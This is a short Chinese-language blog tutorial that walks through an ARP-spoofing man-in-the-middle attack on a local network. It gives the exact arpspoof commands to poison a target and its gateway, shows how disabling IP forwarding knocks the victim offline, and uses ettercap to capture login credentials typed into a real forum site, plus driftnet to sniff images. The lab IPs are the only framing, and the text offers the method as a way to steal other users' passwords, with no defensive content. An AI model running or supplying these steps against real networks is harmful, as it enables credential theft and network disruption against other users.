日期:2019-07-18 14:24:42
更新:
作者:Bay0net
介紹:如何在局域網內,竊取其他用戶的賬號密碼?
0x01、 漏洞環境
攻擊工具 arpspoof
基本用法:
arpspoof -i eth0 -t 【目標 IP】 【網關】
arpspoof -i eth0 -t 【網關】【目標 IP】
攻擊機
IP:192.168.43.67
操作系統:Kali 2019
靶機
IP:192.168.43.135
操作系統:Win7 旗艦版 SP1
攻擊機和靶機,在同一個局域網內,局域網的網關是 192.168.43.1
0x02、攻擊過程
使靶機斷網
在 kali 上,需要開啟轉發 IP 的功能,否則靶機會斷網,所以可以使用該方法讓靶機斷網。
先欺騙靶機,開啟兩個命令行界面,分別輸入下面兩條命令
# 欺騙靶機
arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
arpspoof -i eth0 -t 192.168.43.1 192.168.43.135

然后再開一個命令行,輸入以下命令,關閉 ip_forward
功能。
# 0 代表關閉 ip_forward 功能
echo '0' > /proc/sys/net/ipv4/ip_forward

靶機已經無法連接互聯網,一直在轉圈。

如果想恢復主機的網絡,再使用下面的語句即可。
echo '1' > /proc/sys/net/ipv4/ip_forward
竊取密碼
演示的網站:http://www.discuz.net/forum.php
第一步,還是欺騙靶機,開啟兩個命令行界面,分別輸入下面兩條命令
# 欺騙靶機
arpspoof -i eth0 -t 192.168.43.135 192.168.43.1
arpspoof -i eth0 -t 192.168.43.1 192.168.43.135
第二步,開啟轉發
echo '1' > /proc/sys/net/ipv4/ip_forward
第三步,使用工具進行嗅探
ettercap -Tq -i eth0

此時在靶機輸入賬號密碼進行登錄,kali 會自動分析並且把密碼顯示出來。

點擊登錄,查看一下 kali,已經抓到了賬號密碼。

嗅探圖片
driftnet -i eth0